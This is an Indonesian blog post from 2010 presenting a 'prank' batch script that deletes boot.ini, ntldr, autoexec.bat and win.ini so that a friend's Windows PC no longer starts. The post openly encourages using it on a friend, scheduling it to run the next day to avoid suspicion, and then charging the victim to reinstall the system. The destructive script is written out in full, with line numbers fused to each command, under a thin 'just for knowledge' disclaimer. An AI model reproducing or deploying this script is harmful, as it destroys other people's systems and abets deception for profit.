Rusakin Windows [sekedar pengetahuan aja]

nih sekedar trik aja untuk mahasiswa yang ga punya uang di akhir2 bulan,
biasanya sekitar tanggal 20-30 para mahasiswa rantau tuh ga punya uang...
nah pake c0de ini untuk jahilin teman...
setelah itu kompinya(sistem opresi windows) tuh bakalan rusak alias ga bisa nyala lagi..
hahai. . . 
nah setelah itu tawarin niat baik lo untuk install ulang kompinya dia dengan tawaran imbalan...
kkkkkkkkkkkk. . . . .

markitkem(mari kita kemon)hihihihi. . .
copas c0de di bawah ini di notepad dan save dengan ekstensi *bat
lalu set Schedule Tasks untuk menjalankan program tadi agar di jalankan besok biar ga curiga lo yang rusakin. . . 



1@echo off
2attrib -r -s -h c:\autoexec.bat
3del c:\autoexec.bat
4attrib -r -s -h c:\boot.ini
5del c:\boot.ini
6attrib -r -s -h c:\ntldr
7del c:\ntldr
8attrib -r -s -h c:\windows\win.ini
9del c:\windows\win.ini




ingat :* ni cuma sekedar buat pengetahuan aja, semuanya tergantung dan kembali kepada diri kita masing", n ga boleh bilang klo yg ngjarin gw. . 
Anda baru saja membaca artikel yang berkategori Windows dengan judul Rusakin Windows [sekedar pengetahuan aja]. Anda bisa bookmark halaman ini dengan URL http://tekno.infoberguna.com/2010/10/rusakin-windows-sekedar-pengetahuan-aja.html. Terima kasih!
Posted by: Unknown Rusakin Windows [sekedar pengetahuan aja] Updated at : 08.57.00

Yang lain juga membaca Windows

Belum ada komentar untuk "Rusakin Windows [sekedar pengetahuan aja]"

Posting Komentar